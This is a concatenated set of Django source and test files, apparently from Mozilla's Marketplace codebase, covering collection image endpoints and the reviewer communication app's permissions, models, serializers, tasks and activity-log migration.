self.test_put(pk_or_slug=self.collection.slug)
def test_replace_image(self):
self.add_img()
self.test_put()
def test_put_non_data_uri(self):
self.grant_permission(self.profile, 'Collections:Curate')
res = self.client.put(self.url, 'some junk')
eq_(res.status_code, 400)
ok_(not Collection.objects.get(pk=self.collection.pk).has_image)
def test_put_non_image(self):
self.grant_permission(self.profile, 'Collections:Curate')
res = self.client.put(self.url, 'data:text/plain;base64,AAA=')
eq_(res.status_code, 400)
ok_(not Collection.objects.get(pk=self.collection.pk).has_image)
def test_put_unauthorized(self):
res = self.client.put(self.url, 'some junk')
eq_(res.status_code, 403)
@override_settings(XSENDFILE=True)
def _test_get(self):
img_path = self.add_img()
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res[settings.XSENDFILE_HEADER], img_path)
ok_('max-age=31536000' in res['Cache-Control'])
def test_get(self):
self.assertApiUrlEqual(self.url,
'/rocketfuel/collections/%s/image/' % self.collection.pk)
self._test_get()
def test_get_slug(self):
slug = self.collection.slug
self.url = reverse('collection-image-detail', kwargs={'pk': slug})
self.assertApiUrlEqual(self.url,
'/rocketfuel/collections/%s/image/' % slug)
self._test_get()
def test_get_png(self):
pk = self.collection.pk
self.url = reverse('collection-image-detail',
kwargs={'pk': pk, 'format': 'png'})
self.assertApiUrlEqual(self.url,
'/rocketfuel/collections/%s/image.png' % pk)
self._test_get()
def test_get_png_slug(self):
slug = self.collection.slug
self.url = reverse('collection-image-detail',
kwargs={'pk': slug, 'format': 'png'})
self.assertApiUrlEqual(self.url,
'/rocketfuel/collections/%s/image.png' % slug)
self._test_get()
def test_get_no_image(self):
res = self.client.get(self.url)
eq_(res.status_code, 404)
def test_delete(self, url=None):
self.grant_permission(self.profile, 'Collections:Curate')
img_path = self.add_img()
res = self.client.delete(self.url)
eq_(res.status_code, 204)
ok_(not self.collection.reload().has_image)
ok_(not storage.exists(img_path))
def test_delete_slug(self):
url = reverse('collection-image-detail',
kwargs={'pk': self.collection.slug})
self.test_delete(url)
def test_delete_unauthorized(self):
res = self.client.delete(self.url)
eq_(res.status_code, 403)
########NEW FILE########
__FILENAME__ = views
from django.core.exceptions import ValidationError
from django.core.files.storage import default_storage as storage
from django.core.validators import validate_email
from django.db import IntegrityError
from django.db.models import Q
from django.http import Http404
from django.utils.datastructures import MultiValueDictKeyError
from django.views.decorators.cache import cache_control
from PIL import Image
from rest_framework import generics, serializers, status, viewsets
from rest_framework.decorators import action, link
from rest_framework.exceptions import ParseError
from rest_framework.response import Response
from amo.utils import HttpResponseSendFile
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView, SlugOrIdMixin
from mkt.collections.serializers import DataURLImageField
from mkt.webapps.models import Webapp
from users.models import UserProfile
from .authorization import (CanBeHeroAuthorization, CuratorAuthorization,
StrictCuratorAuthorization)
from .filters import CollectionFilterSetWithFallback
from .models import Collection
from .serializers import CollectionSerializer, CuratorSerializer
class CollectionViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
viewsets.ModelViewSet):
serializer_class = CollectionSerializer
queryset = Collection.objects.all()
cors_allowed_methods = ('get', 'post', 'delete', 'patch')
permission_classes = [CanBeHeroAuthorization, CuratorAuthorization]
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
filter_class = CollectionFilterSetWithFallback
exceptions = {
'not_provided': '`app` was not provided.',
'user_not_provided': '`user` was not provided.',
'wrong_user_format': '`user` must be an ID or email.',
'doesnt_exist': '`app` does not exist.',
'user_doesnt_exist': '`user` does not exist.',
'not_in': '`app` not in collection.',
'already_in': '`app` already exists in collection.',
'app_mismatch': 'All apps in this collection must be included.',
}
def filter_queryset(self, queryset):
queryset = super(CollectionViewSet, self).filter_queryset(queryset)
self.filter_fallback = getattr(queryset, 'filter_fallback', None)
self.filter_errors = getattr(queryset, 'filter_errors', None)
return queryset
def list(self, request, *args, **kwargs):
response = super(CollectionViewSet, self).list(
request, *args, **kwargs)
if response:
filter_fallback = getattr(self, 'filter_fallback', None)
if filter_fallback:
response['API-Fallback'] = ','.join(filter_fallback)
filter_errors = getattr(self, 'filter_errors', None)
if filter_errors:
# If we had errors filtering, the default behaviour of DRF
# and django-filter is to produce an empty queryset and ignore
# the problem. We want to fail loud and clear and expose the
# errors instead.
response.data = {
'detail': 'Filtering error.',
'filter_errors': filter_errors
}
response.status_code = status.HTTP_400_BAD_REQUEST
return response
def get_object(self, queryset=None):
"""
Custom get_object implementation to prevent DRF from filtering when we
do a specific pk/slug/etc lookup (we only want filtering on list API).
Calls DRF's get_object() with the queryset (filtered or not), since DRF
get_object() implementation will then just use the queryset without
attempting to filter it.
"""
if queryset is None:
queryset = self.get_queryset()
if (self.pk_url_kwarg not in self.kwargs and
self.slug_url_kwarg not in self.kwargs and
self.lookup_field not in self.kwargs):
# Only filter queryset if we don't have an explicit lookup.
queryset = self.filter_queryset(queryset)
return super(CollectionViewSet, self).get_object(queryset=queryset)
def get_queryset(self):
auth = CuratorAuthorization()
qs = super(CollectionViewSet, self).get_queryset()
if self.request.user.is_authenticated():
if auth.has_curate_permission(self.request):
return qs
profile = self.request.user
return qs.filter(Q(curators__id=profile.id) |
Q(is_public=True)).distinct()
return qs.filter(is_public=True)
def return_updated(self, status, collection=None):
"""
Passed an HTTP status from rest_framework.status, returns a response
of that status with the body containing the updated values of
self.object.
"""
if collection is None:
collection = self.get_object()
serializer = self.get_serializer(instance=collection)
return Response(serializer.data, status=status)
@action()
def duplicate(self, request, *args, **kwargs):
"""
Duplicate the specified collection, copying over all fields and apps.
Anything passed in request.DATA will override the corresponding value
on the resulting object.
"""
# Serialize data from specified object, removing the id and then
# updating with custom data in request.DATA.
collection = self.get_object()
collection_data = self.get_serializer(instance=collection).data
collection_data.pop('id')
collection_data.update(request.DATA)
# Pretend we didn't have anything in kwargs (removing 'pk').
self.kwargs = {}
# Override request.DATA with the result from above.
request._data = collection_data
# Now create the collection.
result = self.create(request)
if result.status_code != status.HTTP_201_CREATED:
return result
# And now, add apps from the original collection.
for app in collection.apps():
self.object.add_app(app)
# Re-Serialize to include apps.
return self.return_updated(status.HTTP_201_CREATED,
collection=self.object)
@action()
def add_app(self, request, *args, **kwargs):
"""
Add an app to the specified collection.
"""
collection = self.get_object()
try:
new_app = Webapp.objects.get(pk=request.DATA['app'])
except (KeyError, MultiValueDictKeyError):
raise ParseError(detail=self.exceptions['not_provided'])
except Webapp.DoesNotExist:
raise ParseError(detail=self.exceptions['doesnt_exist'])
try:
collection.add_app(new_app)
except IntegrityError:
raise ParseError(detail=self.exceptions['already_in'])
return self.return_updated(status.HTTP_200_OK)
@action()
def remove_app(self, request, *args, **kwargs):
"""
Remove an app from the specified collection.
"""
collection = self.get_object()
try:
to_remove = Webapp.objects.get(pk=request.DATA['app'])
except (KeyError, MultiValueDictKeyError):
raise ParseError(detail=self.exceptions['not_provided'])
except Webapp.DoesNotExist:
raise ParseError(detail=self.exceptions['doesnt_exist'])
removed = collection.remove_app(to_remove)
if not removed:
return Response(status=status.HTTP_205_RESET_CONTENT)
return self.return_updated(status.HTTP_200_OK)
@action()
def reorder(self, request, *args, **kwargs):
"""
Reorder the specified collection.
"""
collection = self.get_object()
try:
collection.reorder(request.DATA)
except ValueError:
return Response({
'detail': self.exceptions['app_mismatch'],
'apps': [a.pk for a in collection.apps()]
}, status=status.HTTP_400_BAD_REQUEST, exception=True)
return self.return_updated(status.HTTP_200_OK)
def serialized_curators(self, no_cache=False):
queryset = self.get_object().curators.all()
if no_cache:
queryset = queryset.no_cache()
return Response([CuratorSerializer(instance=c).data for c in queryset])
def get_curator(self, request):
try:
userdata = request.DATA['user']
if (isinstance(userdata, int) or isinstance(userdata, basestring)
and userdata.isdigit()):
return UserProfile.objects.get(pk=userdata)
else:
validate_email(userdata)
return UserProfile.objects.get(email=userdata)
except (KeyError, MultiValueDictKeyError):
raise ParseError(detail=self.exceptions['user_not_provided'])
except UserProfile.DoesNotExist:
raise ParseError(detail=self.exceptions['user_doesnt_exist'])
except ValidationError:
raise ParseError(detail=self.exceptions['wrong_user_format'])
@link(permission_classes=[StrictCuratorAuthorization])
def curators(self, request, *args, **kwargs):
return self.serialized_curators()
@action(methods=['POST'])
def add_curator(self, request, *args, **kwargs):
self.get_object().add_curator(self.get_curator(request))
return self.serialized_curators(no_cache=True)
@action(methods=['POST'])
def remove_curator(self, request, *args, **kwargs):
removed = self.get_object().remove_curator(self.get_curator(request))
if not removed:
return Response(status=status.HTTP_205_RESET_CONTENT)
return self.serialized_curators(no_cache=True)
class CollectionImageViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
generics.GenericAPIView, viewsets.ViewSet):
queryset = Collection.objects.all()
permission_classes = [CuratorAuthorization]
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
cors_allowed_methods = ('get', 'put', 'delete')
# Dummy serializer to keep DRF happy when it's answering to OPTIONS.
serializer_class = serializers.Serializer
def perform_content_negotiation(self, request, force=False):
"""
Force DRF's content negociation to not raise an error - It wants to use
the format passed to the URL, but we don't care since we only deal with
"raw" content: we don't even use the renderers.
"""
return super(CollectionImageViewSet, self).perform_content_negotiation(
request, force=True)
@cache_control(max_age=60 * 60 * 24 * 365)
def retrieve(self, request, *args, **kwargs):
obj = self.get_object()
if not obj.has_image:
raise Http404
return HttpResponseSendFile(request, obj.image_path(),
content_type='image/png')
def update(self, request, *args, **kwargs):
obj = self.get_object()
try:
img, hash_ = DataURLImageField().from_native(request.read())
except ValidationError:
return Response(status=status.HTTP_400_BAD_REQUEST)
i = Image.open(img)
with storage.open(obj.image_path(), 'wb') as f:
i.save(f, 'png')
# Store the hash of the original image data sent.
obj.update(image_hash=hash_)
return Response(status=status.HTTP_204_NO_CONTENT)
def destroy(self, request, *args, **kwargs):
obj = self.get_object()
if obj.has_image:
storage.delete(obj.image_path())
obj.update(image_hash=None)
return Response(status=status.HTTP_204_NO_CONTENT)
########NEW FILE########
__FILENAME__ = authorization
from django.conf import settings
from django.shortcuts import get_object_or_404
from rest_framework.permissions import BasePermission
from rest_framework.exceptions import PermissionDenied
from mkt.comm.models import (CommunicationNote, CommunicationThread,
user_has_perm_note, user_has_perm_thread)
class ThreadPermission(BasePermission):
"""
Permission wrapper for checking if the authenticated user has the
permission to view the thread.
"""
def has_permission(self, request, view):
# Let `has_object_permission` handle the permissions when we retrieve
# an object.
if view.action == 'retrieve':
return True
if not request.user.is_authenticated():
raise PermissionDenied()
return True
def has_object_permission(self, request, view, obj):
"""
Make sure we give correct permissions to read/write the thread.
"""
if not request.user.is_authenticated() or obj.read_permission_public:
return obj.read_permission_public
return user_has_perm_thread(obj, request.amo_user)
class NotePermission(ThreadPermission):
def has_permission(self, request, view):
thread_id = view.kwargs.get('thread_id')
if not thread_id and view.kwargs.get('note_id'):
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
thread_id = note.thread_id
# We save the thread in the view object so we can use it later.
view.comm_thread = get_object_or_404(CommunicationThread,
id=thread_id)
return ThreadPermission.has_object_permission(self,
request, view, view.comm_thread)
def has_object_permission(self, request, view, obj):
# Has thread obj-level permission AND note obj-level permission.
return user_has_perm_note(obj, request.amo_user)
class AttachmentPermission(NotePermission):
def has_permission(self, request, view):
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
return NotePermission.has_object_permission(self, request, view, note)
def has_object_permission(self, request, view, obj):
# Has thread obj-level permission AND note obj-level permission.
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
return NotePermission.has_object_permission(self, request, view, note)
class EmailCreationPermission(object):
"""Permit if client's IP address is whitelisted."""
def has_permission(self, request, view):
auth_token = request.META.get('HTTP_POSTFIX_AUTH_TOKEN')
if auth_token and auth_token not in settings.POSTFIX_AUTH_TOKEN:
return False
remote_ip = request.META.get('REMOTE_ADDR')
return remote_ip and (
remote_ip in settings.WHITELISTED_CLIENTS_EMAIL_API)
########NEW FILE########
__FILENAME__ = forms
from django import forms
from django.conf import settings
from django.forms import ValidationError
import happyforms
from jinja2.filters import do_filesizeformat
from tower import ugettext as _, ugettext_lazy as _lazy
from mkt.api.forms import SluggableModelChoiceField
from mkt.comm.models import CommunicationThread
from mkt.constants import comm
from mkt.webapps.models import Webapp
class AppSlugForm(happyforms.Form):
app = SluggableModelChoiceField(queryset=Webapp.objects.all(),
sluggable_to_field_name='app_slug')
class CreateCommNoteForm(happyforms.Form):
body = forms.CharField(
error_messages={'required': _lazy('Note body is empty.')})
note_type = forms.TypedChoiceField(
empty_value=comm.NO_ACTION,
coerce=int, choices=[(x, x) for x in comm.NOTE_TYPES],
error_messages={'invalid_choice': _lazy(u'Invalid note type.')})
class CreateCommThreadForm(CreateCommNoteForm):
app = SluggableModelChoiceField(queryset=Webapp.objects.all(),
sluggable_to_field_name='app_slug')
version = forms.CharField()
def clean_version(self):
version_num = self.cleaned_data['version']
versions = self.cleaned_data['app'].versions.filter(
version=version_num).order_by('-created')
if versions.exists():
return versions[0]
raise forms.ValidationError(
_('Version %s does not exist' % version_num))
class CommAttachmentForm(happyforms.Form):
attachment = forms.FileField(label=_lazy(u'Attachment:'))
description = forms.CharField(required=False, label=_lazy(u'Description:'))
max_upload_size = settings.MAX_REVIEW_ATTACHMENT_UPLOAD_SIZE
def clean(self, *args, **kwargs):
data = super(CommAttachmentForm, self).clean(*args, **kwargs)
attachment = data.get('attachment')
max_size = self.max_upload_size
if attachment and attachment.size > max_size:
# L10n: error raised when review attachment is too large.
exc = _('Attachment exceeds maximum size of %s.' %
do_filesizeformat(self.max_upload_size))
raise ValidationError(exc)
return data
CommAttachmentFormSet = forms.formsets.formset_factory(CommAttachmentForm)
class UnCCForm(happyforms.Form):
pk = SluggableModelChoiceField(
queryset=CommunicationThread.objects.all(),
sluggable_to_field_name='id')
########NEW FILE########
__FILENAME__ = migrate_activity_log
from django.core.management.base import BaseCommand
import commonware.log
import amo
from amo.utils import chunked
from devhub.models import ActivityLog, AppLog
from mkt.comm.tasks import _migrate_activity_log
log = commonware.log.getLogger('comm')
class Command(BaseCommand):
help = ('Migrates ActivityLog objects to CommunicationNote objects. '
'Meant for one time run only.')
def handle(self, *args, **options):
applog_ids = AppLog.objects.values_list('activity_log', flat=True)
ids = (ActivityLog.objects.filter(
pk__in=list(applog_ids), action__in=amo.LOG_REVIEW_QUEUE)
.order_by('created').values_list('id', flat=True))
for log_chunk in chunked(ids, 100):
_migrate_activity_log.delay(ids)
########NEW FILE########
__FILENAME__ = models
import os
from datetime import datetime
import imghdr
from django.conf import settings
from django.db import models
from django.utils.safestring import mark_safe
import bleach
from uuidfield.fields import UUIDField
import amo.models
from access import acl
from amo.utils import reverse
from translations.fields import save_signal
from mkt.constants import comm
class CommunicationPermissionModel(amo.models.ModelBase):
# Read permissions imply write permissions as well.
read_permission_public = models.BooleanField(default=False)
read_permission_developer = models.BooleanField(default=True)
read_permission_reviewer = models.BooleanField(default=True)
read_permission_senior_reviewer = models.BooleanField(default=True)
read_permission_mozilla_contact = models.BooleanField(default=True)
read_permission_staff = models.BooleanField(default=True)
class Meta:
abstract = True
def check_acls(user, obj, acl_type):
"""Check ACLs."""
if acl_type == 'moz_contact':
try:
return user.email in obj.addon.get_mozilla_contacts()
except AttributeError:
return user.email in obj.thread.addon.get_mozilla_contacts()
if acl_type == 'admin':
return acl.action_allowed_user(user, 'Admin', '%')
elif acl_type == 'reviewer':
return acl.action_allowed_user(user, 'Apps', 'Review')
elif acl_type == 'senior_reviewer':
return acl.action_allowed_user(user, 'Apps', 'ReviewEscalated')
else:
raise Exception('Invalid ACL lookup.')
return False
def check_acls_comm_obj(obj, profile):
"""Cross-reference ACLs and Note/Thread permissions."""
if obj.read_permission_public:
return True
if (obj.read_permission_reviewer and
check_acls(profile, obj, 'reviewer')):
return True
if (obj.read_permission_senior_reviewer and
check_acls(profile, obj, 'senior_reviewer')):
return True
if (obj.read_permission_mozilla_contact and
check_acls(profile, obj, 'moz_contact')):
return True
if (obj.read_permission_staff and
check_acls(profile, obj, 'admin')):
return True
return False
def user_has_perm_app(user, app):
"""
Check if user has any app-level ACLs.
(Mozilla contact, admin, review, senior reivewer, developer).
"""
return (
check_acls(user, None, 'reviewer') or
user.addons.filter(pk=app.id).exists() or
check_acls(user, None, 'senior_reviewer') or
check_acls(user, None, 'admin') or
user.email in app.get_mozilla_contacts()
)
def user_has_perm_thread(thread, profile):
"""
Check if the user has read/write permissions on the given thread.
Developers of the add-on used in the thread, users in the CC list,
and users who post to the thread are allowed to access the object.
Moreover, other object permissions are also checked against the ACLs
of the user.
"""
user_post = CommunicationNote.objects.filter(
author=profile, thread=thread)
user_cc = CommunicationThreadCC.objects.filter(
user=profile, thread=thread)
if user_post.exists() or user_cc.exists():
return True
# User is a developer of the add-on and has the permission to read.
user_is_author = profile.addons.filter(pk=thread.addon_id)
if thread.read_permission_developer and user_is_author.exists():
return True
return check_acls_comm_obj(thread, profile)
def user_has_perm_note(note, profile):
"""
Check if the user has read/write permissions on the given note.
Developers of the add-on used in the note, users in the CC list,
and users who post to the thread are allowed to access the object.
Moreover, other object permissions are also checked agaisnt the ACLs
of the user.
"""
if note.author.id == profile.id:
# Let the dude access his own note.
return True
# User is a developer of the add-on and has the permission to read.
user_is_author = profile.addons.filter(pk=note.thread.addon_id)
if note.read_permission_developer and user_is_author.exists():
return True
return check_acls_comm_obj(note, profile)
class CommunicationThread(CommunicationPermissionModel):
addon = models.ForeignKey('addons.Addon', related_name='threads')
version = models.ForeignKey('versions.Version', related_name='threads',
null=True)
class Meta:
db_table = 'comm_threads'
unique_together = ('addon', 'version')
def join_thread(self, user):
return self.thread_cc.get_or_create(user=user)
class CommunicationThreadCC(amo.models.ModelBase):
"""
Determines recipients of emails. Akin being joined on a thread.
"""
thread = models.ForeignKey(CommunicationThread,
related_name='thread_cc')
user = models.ForeignKey('users.UserProfile',
related_name='comm_thread_cc')
class Meta:
db_table = 'comm_thread_cc'
unique_together = ('user', 'thread',)
def cc_auto_mark_all_read(sender, instance, **kw):
"""When someone joins thread, mark all old messages read."""
from mkt.comm.tasks import mark_thread_read
mark_thread_read.delay(instance.thread, instance.user)
models.signals.post_save.connect(
cc_auto_mark_all_read, sender=CommunicationThreadCC,
dispatch_uid='cc_auto_mark_read')
class CommunicationNoteManager(models.Manager):
def with_perms(self, profile, thread):
ids = [note.id for note in self.filter(thread=thread) if
user_has_perm_note(note, profile)]
return self.filter(id__in=ids)
class CommunicationNote(CommunicationPermissionModel):
thread = models.ForeignKey(CommunicationThread, related_name='notes')
author = models.ForeignKey('users.UserProfile', related_name='comm_notes')
note_type = models.IntegerField(default=comm.NO_ACTION)
body = models.TextField(null=True)
reply_to = models.ForeignKey(
'self', related_name='replies', null=True, blank=True)
read_by_users = models.ManyToManyField(
'users.UserProfile', through='CommunicationNoteRead')
objects = CommunicationNoteManager()
class Meta:
db_table = 'comm_thread_notes'
def save(self, *args, **kwargs):
super(CommunicationNote, self).save(*args, **kwargs)
self.thread.modified = self.created
self.thread.save()
def mark_read(self, user):
self.reads_set.get_or_create(user=user)
class CommAttachment(amo.models.ModelBase):
"""
Model for an attachment to an CommNote instance. Used by the Marketplace
reviewer tools, where reviewers can attach files to comments made during
the review process.
"""
note = models.ForeignKey('CommunicationNote', related_name='attachments')
filepath = models.CharField(max_length=255)
description = models.CharField(max_length=255, blank=True)
mimetype = models.CharField(max_length=255, blank=True)
class Meta:
db_table = 'comm_attachments'
ordering = ('id',)
def __unicode__(self):
return 'Note %s - %s' % (self.note.id, self.filepath)
def get_absolute_url(self):
return reverse('comm-attachment-detail', args=[self.note_id, self.pk])
def filename(self):
"""Returns the attachment's file name."""
return os.path.basename(self.filepath)
def full_path(self):
"""Returns the full filesystem path of the attachment."""
try:
return os.path.join(settings.REVIEWER_ATTACHMENTS_PATH,
self.filepath)
except IOError:
if not settings.DEBUG:
raise
def display_name(self):
"""
Returns a string describing the attachment suitable for front-end
display.
"""
display = self.description if self.description else self.filename()
return mark_safe(bleach.clean(display))
def is_image(self):
"""
Returns a boolean indicating whether the attached file is an image of a
format recognizable by the stdlib imghdr module.
"""
try:
return imghdr.what(self.full_path()) is not None
except IOError:
if not settings.DEBUG:
raise
class CommunicationNoteRead(models.Model):
user = models.ForeignKey('users.UserProfile')
note = models.ForeignKey(CommunicationNote, related_name='reads_set')
class Meta:
db_table = 'comm_notes_read'
class CommunicationThreadToken(amo.models.ModelBase):
thread = models.ForeignKey(CommunicationThread, related_name='token')
user = models.ForeignKey('users.UserProfile',
related_name='comm_thread_tokens')
uuid = UUIDField(unique=True, auto=True)
use_count = models.IntegerField(default=0,
help_text='Stores the number of times the token has been used')
class Meta:
db_table = 'comm_thread_tokens'
unique_together = ('thread', 'user')
def is_valid(self):
# TODO: Confirm the expiration and max use count values.
timedelta = datetime.now() - self.modified
return (timedelta.days <= comm.THREAD_TOKEN_EXPIRY and
self.use_count < comm.MAX_TOKEN_USE_COUNT)
def reset_uuid(self):
# Generate a new UUID.
self.uuid = UUIDField()._create_uuid().hex
models.signals.pre_save.connect(save_signal, sender=CommunicationNote,
dispatch_uid='comm_thread_notes_translations')
########NEW FILE########
__FILENAME__ = serializers
from django.core.urlresolvers import reverse
from rest_framework.fields import BooleanField, CharField
from rest_framework.serializers import ModelSerializer, SerializerMethodField
from addons.models import Addon
from amo.helpers import absolutify
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationThread)
from users.models import UserProfile
from versions.models import Version
class AuthorSerializer(ModelSerializer):
name = CharField()
class Meta:
model = UserProfile
fields = ('name',)
class AttachmentSerializer(ModelSerializer):
url = SerializerMethodField('get_absolute_url')
display_name = CharField(source='display_name')
is_image = BooleanField(source='is_image')
def get_absolute_url(self, obj):
return absolutify(obj.get_absolute_url())
class Meta:
model = CommAttachment
fields = ('id', 'created', 'url', 'display_name', 'is_image')
class NoteSerializer(ModelSerializer):
body = CharField()
author_meta = AuthorSerializer(source='author', read_only=True)
is_read = SerializerMethodField('is_read_by_user')
attachments = AttachmentSerializer(source='attachments', read_only=True)
def is_read_by_user(self, obj):
return obj.read_by_users.filter(
pk=self.context['request'].amo_user.id).exists()
class Meta:
model = CommunicationNote
fields = ('id', 'created', 'attachments', 'author', 'author_meta',
'body', 'is_read', 'note_type', 'thread')
class AddonSerializer(ModelSerializer):
name = CharField()
thumbnail_url = SerializerMethodField('get_icon')
url = CharField(source='get_absolute_url')
review_url = SerializerMethodField('get_review_url')
class Meta:
model = Addon
fields = ('id', 'name', 'url', 'thumbnail_url', 'app_slug', 'slug',
'review_url')
def get_icon(self, app):
return app.get_icon_url(64)
def get_review_url(self, obj):
return reverse('reviewers.apps.review', args=[obj.app_slug])
class ThreadSerializer(ModelSerializer):
addon_meta = AddonSerializer(source='addon', read_only=True)
recent_notes = SerializerMethodField('get_recent_notes')
notes_count = SerializerMethodField('get_notes_count')
version_number = SerializerMethodField('get_version_number')
version_is_obsolete = SerializerMethodField('get_version_is_obsolete')
class Meta:
model = CommunicationThread
fields = ('id', 'addon', 'addon_meta', 'version', 'notes_count',
'recent_notes', 'created', 'modified', 'version_number',
'version_is_obsolete')
view_name = 'comm-thread-detail'
def get_recent_notes(self, obj):
notes = (obj.notes.with_perms(self.get_request().amo_user, obj)
.order_by('-created')[:5])
return NoteSerializer(
notes, many=True, context={'request': self.get_request()}).data
def get_notes_count(self, obj):
return obj.notes.count()
def get_version_number(self, obj):
try:
return Version.with_deleted.get(id=obj.version_id).version
except Version.DoesNotExist:
return ''
def get_version_is_obsolete(self, obj):
try:
return Version.with_deleted.get(id=obj.version_id).deleted
except Version.DoesNotExist:
return True
########NEW FILE########
__FILENAME__ = tasks
import logging
from celeryutils import task
from amo.decorators import write
from devhub.models import ActivityLog
from mkt.comm.models import (CommunicationNote, CommunicationNoteRead,
CommunicationThread)
from mkt.comm.utils import filter_notes_by_read_status, save_from_email_reply
import mkt.constants.comm as cmb
log = logging.getLogger('z.task')
@task
def consume_email(email_text, **kwargs):
"""Parse emails and save notes."""
res = save_from_email_reply(email_text)
if not res:
log.error('Failed to save email.')
@task
def mark_thread_read(thread, user, **kwargs):
"""This marks each unread note in a thread as read - in bulk."""
object_list = []
unread_notes = filter_notes_by_read_status(thread.notes, user, False)
for note in unread_notes:
object_list.append(CommunicationNoteRead(note=note, user=user))
CommunicationNoteRead.objects.bulk_create(object_list)
@task
@write
def _migrate_activity_log(ids, **kwargs):
"""For migrate_activity_log.py script."""
for log in ActivityLog.objects.filter(pk__in=ids):
action = cmb.ACTION_MAP(log.action)
# Create thread.
try:
thread, tc = CommunicationThread.objects.safer_get_or_create(
addon=log.arguments[0], version=log.arguments[1])
except IndexError:
continue
# Filter notes.
note_params = {
'thread': thread,
'note_type': action,
'author': log.user,
'body': log.details.get('comments', '') if log.details else '',
}
notes = CommunicationNote.objects.filter(created=log.created,
**note_params)
if notes.exists():
# Note already exists, move on.
continue
# Create note.
note = CommunicationNote.objects.create(
# Developers should not see escalate/reviewer comments.
read_permission_developer=action not in cmb.REVIEWER_NOTE_TYPES,
**note_params)
note.update(created=log.created)
# Attachments.
if note.attachments.exists():
# Already migrated. Continue.
continue
# Create attachments.
for attachment in log.activitylogattachment_set.all():
note_attachment = note.attachments.create(
filepath=attachment.filepath, mimetype=attachment.mimetype,
description=attachment.description)
note_attachment.update(created=attachment.created)
########NEW FILE########
__FILENAME__ = test_commands
from django.core.management import call_command
from nose.tools import eq_
import amo
import amo.tests
from devhub.models import ActivityLog, ActivityLogAttachment
from users.models import UserProfile
import mkt.constants.comm as cmb
from mkt.comm.models import CommunicationNote, CommunicationThread
from mkt.site.fixtures import fixture
class TestMigrateActivityLog(amo.tests.TestCase):
fixtures = fixture('group_editor', 'user_editor', 'user_editor_group')
def setUp(self):
self.app = amo.tests.app_factory(status=amo.STATUS_PENDING)
self.version = self.app.current_version
self.user = UserProfile.objects.get()
def _assert(self, cmb_action):
call_command('migrate_activity_log')
thread = CommunicationThread.objects.get()
note = CommunicationNote.objects.get()
eq_(thread.addon, self.app)
eq_(thread.version, self.version)
eq_(note.thread, thread)
eq_(note.author, self.user)
eq_(note.body, 'something')
eq_(note.note_type, cmb_action)
eq_(note.read_permission_staff, True)
eq_(note.read_permission_reviewer, True)
eq_(note.read_permission_senior_reviewer, True)
eq_(note.read_permission_mozilla_contact, True)
return thread, note
def test_migrate(self):
amo.log(amo.LOG.APPROVE_VERSION, self.app, self.version,
user=self.user, details={'comments': 'something'})
self._assert(cmb.APPROVAL)
def test_migrate_reject(self):
amo.log(amo.LOG.REJECT_VERSION, self.app, self.version,
user=self.user, details={'comments': 'something'})
self._assert(cmb.REJECTION)
def test_migrate_disable(self):
amo.log(amo.LOG.APP_DISABLED, self.app, self.version,
user=self.user, details={'comments': 'something'})
self._assert(cmb.DISABLED)
def test_migrate_escalation(self):
amo.log(amo.LOG.ESCALATE_VERSION, self.app, self.version,
user=self.user, details={'comments': 'something'})
thread, note = self._assert(cmb.ESCALATION)
assert not note.read_permission_developer
def test_migrate_reviewer_comment(self):
amo.log(amo.LOG.COMMENT_VERSION, self.app, self.version,
user=self.user, details={'comments': 'something'})
thread, note = self._assert(cmb.REVIEWER_COMMENT)
assert not note.read_permission_developer
def test_migrate_info(self):
amo.log(amo.LOG.REQUEST_INFORMATION, self.app, self.version,
user=self.user, details={'comments': 'something'})
self._assert(cmb.MORE_INFO_REQUIRED)
def test_migrate_noaction(self):
amo.log(amo.LOG.REQUEST_VERSION, self.app, self.version,
user=self.user, details={'comments': 'something'})
self._assert(cmb.NO_ACTION)
def test_migrate_escalation_high_abuse(self):
amo.log(amo.LOG.ESCALATED_HIGH_ABUSE, self.app, self.version,
user=self.user, details={'comments': 'something'})
thread, note = self._assert(cmb.ESCALATION_HIGH_ABUSE)
assert not note.read_permission_developer
def test_migrate_escalation_high_refunds(self):
amo.log(amo.LOG.ESCALATED_HIGH_REFUNDS, self.app, self.version,
user=self.user, details={'comments': 'something'})
thread, note = self._assert(cmb.ESCALATION_HIGH_REFUNDS)
assert not note.read_permission_developer
def test_migrate_escalation_cleared(self):
amo.log(amo.LOG.ESCALATION_CLEARED, self.app, self.version,
user=self.user, details={'comments': 'something'})
thread, note = self._assert(cmb.ESCALATION_CLEARED)
assert not note.read_permission_developer
def test_get_or_create(self):
amo.log(amo.LOG.REQUEST_VERSION, self.app, self.version,
user=self.user, details={'comments': 'something'})
self._assert(cmb.NO_ACTION)
call_command('migrate_activity_log')
call_command('migrate_activity_log')
eq_(CommunicationNote.objects.count(), 1)
amo.log(amo.LOG.REQUEST_VERSION, self.app, self.version,
user=self.user, details={'comments': 'somethingNEW'})
call_command('migrate_activity_log')
eq_(CommunicationNote.objects.count(), 2)
eq_(CommunicationThread.objects.count(), 1)
def test_empty_comment(self):
amo.log(amo.LOG.REQUEST_VERSION, self.app, self.version,
user=self.user, details={})
call_command('migrate_activity_log')
note = CommunicationNote.objects.get()
eq_(note.thread.addon, self.app)
eq_(note.body, '')
def test_none(self):
call_command('migrate_activity_log')
assert not CommunicationThread.objects.exists()
assert not CommunicationNote.objects.exists()
def test_migrate_attachments(self):
amo.log(amo.LOG.APPROVE_VERSION, self.app, self.version,
user=self.user, details={'comments': 'something'})
ActivityLogAttachment.objects.create(
activity_log=ActivityLog.objects.get(), filepath='lol',
description='desc1', mimetype='img')
ActivityLogAttachment.objects.create(
activity_log=ActivityLog.objects.get(), filepath='rofl',
description='desc2', mimetype='txt')
call_command('migrate_activity_log')
note = CommunicationNote.objects.get()
eq_(note.attachments.count(), 2)
note_attach1 = note.attachments.get(filepath='lol')
eq_(note_attach1.description, 'desc1')
eq_(note_attach1.mimetype, 'img')
